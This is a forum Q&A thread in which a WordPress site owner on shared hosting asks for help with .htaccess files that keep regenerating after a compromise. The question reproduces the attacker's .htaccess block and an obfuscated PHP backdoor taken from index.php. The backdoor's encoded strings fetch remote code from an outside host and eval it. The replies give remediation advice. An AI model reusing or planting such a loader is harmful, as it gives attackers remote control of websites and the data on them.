# .htaccess files are repeatedly being created in File Directory

Tags: php, wordpress, .htaccess, code-injection, malware

I am having around 10 sites in a shared hosting. Recently I have noticed that there are so many .htaccess files have been created and restricting user access.

```
<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
```

Above block is what is written in all code .htaccess. When I delete those, it appears to be regenerated again. meaning there should be a script running somewhere else in the package.I even installed Wordfence plugin to identify the updated files. I restored recent modifications which appeared to be malicious. but still no changes. There are also some encoded code lines in files like index.php which is below.

```
<?php
 $uoeq967= "O)sl 2Te4x-+gazAbuK_6qrjH0RZt*N3mLcVFEWvh;inySJC91oMfYXId5Up.(GP7D,Bw/kQ8";$vpna644='JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3N';$vpna645='zdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3';$vpna646='NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBT';$vpna647='lNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMo';$vpna648='JGNoKTtldmFsKCc/PicuJHJlc3VsdCk7';$vpna643=$vpna644.$vpna645.$vpna646.$vpna647.$vpna648;function cdim173($fsxi199,$rykc638,$ekcu564){return ''.$fsxi199.''.$rykc638.''.$ekcu564.'';}$qfcg427 = cdim173($uoeq967{34},$uoeq967{13}.$uoeq967{3},$uoeq967{3});$uodu186 = cdim173($uoeq967{19}.$uoeq967{17},$uoeq967{2}.$uoeq967{7},'');$lrbk358 = cdim173($uoeq967{22},$uoeq967{19},$uoeq967{52});$hume205 = cdim173($uoeq967{17},'',$uoeq967{43});$xzdo850 = cdim173($uoeq967{34},$uoeq967{19},$uoeq967{13}.$uoeq967{22});$uqmy998 = cdim173($uoeq967{22},$uoeq967{13},$uoeq967{44});$aobc355 =cdim173(cdim173($qfcg427,'',$uodu186),cdim173($lrbk358,$hume205,''),cdim173($xzdo850,'',$uqmy998));$xggn756 = cdim173($uoeq967{34},$uoeq967{22},$uoeq967{7});$gnix510 = cdim173($uoeq967{13},$uoeq967{28},'');$wdfm884 = cdim173($uoeq967{7},'',$uoeq967{19});$loyh183 = cdim173($uoeq967{52},$uoeq967{17},$uoeq967{43});$bwfh819 = cdim173($uoeq967{34},$uoeq967{28},'');$jrmp133 = cdim173($uoeq967{42},$uoeq967{50},'');$iprf791 = cdim173('',$uoeq967{43},'');$hwks376 = cdim173( cdim173($xggn756,$gnix510,$wdfm884), cdim173($loyh183,'',$bwfh819), cdim173($jrmp133,'',$iprf791));$mtzu128 = cdim173($uoeq967{7},'',$uoeq967{39});$hesn342= cdim173($uoeq967{13},$uoeq967{3},$uoeq967{61});$taop807 = cdim173('',$uoeq967{16},$uoeq967{13});$gvcw064 = cdim173($uoeq967{2},$uoeq967{7},$uoeq967{20});$bihf178 = cdim173($uoeq967{8},$uoeq967{19},$uoeq967{56});$efaa907 = cdim173($uoeq967{7},$uoeq967{34},$uoeq967{50});$tvhp307 = cdim173($uoeq967{56},$uoeq967{7},$uoeq967{61});$qyff908 = cdim173(cdim173($mtzu128,$hesn342,''),cdim173('','',$taop807),cdim173($gvcw064,$bihf178.$efaa907,$tvhp307)).'"'.$vpna643.'"'.cdim173($uoeq967{1}.$uoeq967{1},'',$uoeq967{41});$aobc355($hwks376,array('','}'.$qyff908.'//'));//wp-blog-header scp-173?>
```

I have no options to do other than deleting the .htaccess by each and every directory. but it won't solve the problem. What can I possibly do other than emptying my file manager.

Comment: You have been hacked. And probably have more than one hack now in action. Search for `<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$">` and you will see some help on fixing

Comment: You DO have another option than to delete those configuration files. You are even _obliged_ to do that: you need to take down the breached systems and install from scratch. What you are currently trying to do is fix the symptom. That won't work. You need to cure the cause. And you need to take offline those systems _now_ , since someone else has control over all your data and accounts.

Comment: If I take all sites to local, will it be an issue?

Answer (score 2, accepted):

Well, the whole package was hacked. I was unable to do anything. Just as how others suggested I took 2 days to clear the auto generated files one by one. it was deleted and appeared the very next day. Some scripts were probably running at the back which creates the files. So the only solution is;

1. Contacting the hosting provider and ask them to totally clean the
   directory, and start from scratch. OR
2. Contacting a web security analyst and pay them to clear it which
   costs around 199 USD, least.

Yea, shit happens!

Comment: Hello Roshan, 
I am also facing the same issue in Digital Ocean server. 
Can you please recommend any person or third-party service?

Comment: I was suggested trying wordfence and it was not that accurate but it is okay to some extent. Otherwise, my hosting providers suggested me https://www.siteguarding.com/ give it a try.

Answer (score 0):

First, locate the suspected file(s) that usually exist in various directories, open it, and analyze the code. Once it is confirmed that the file is a virus or malware, copy the file name and search it via the search field available at your cpanel. Verify the content and delete every instance of that file from your host directory. Repeat the process until you notice that no more regeneration is happening.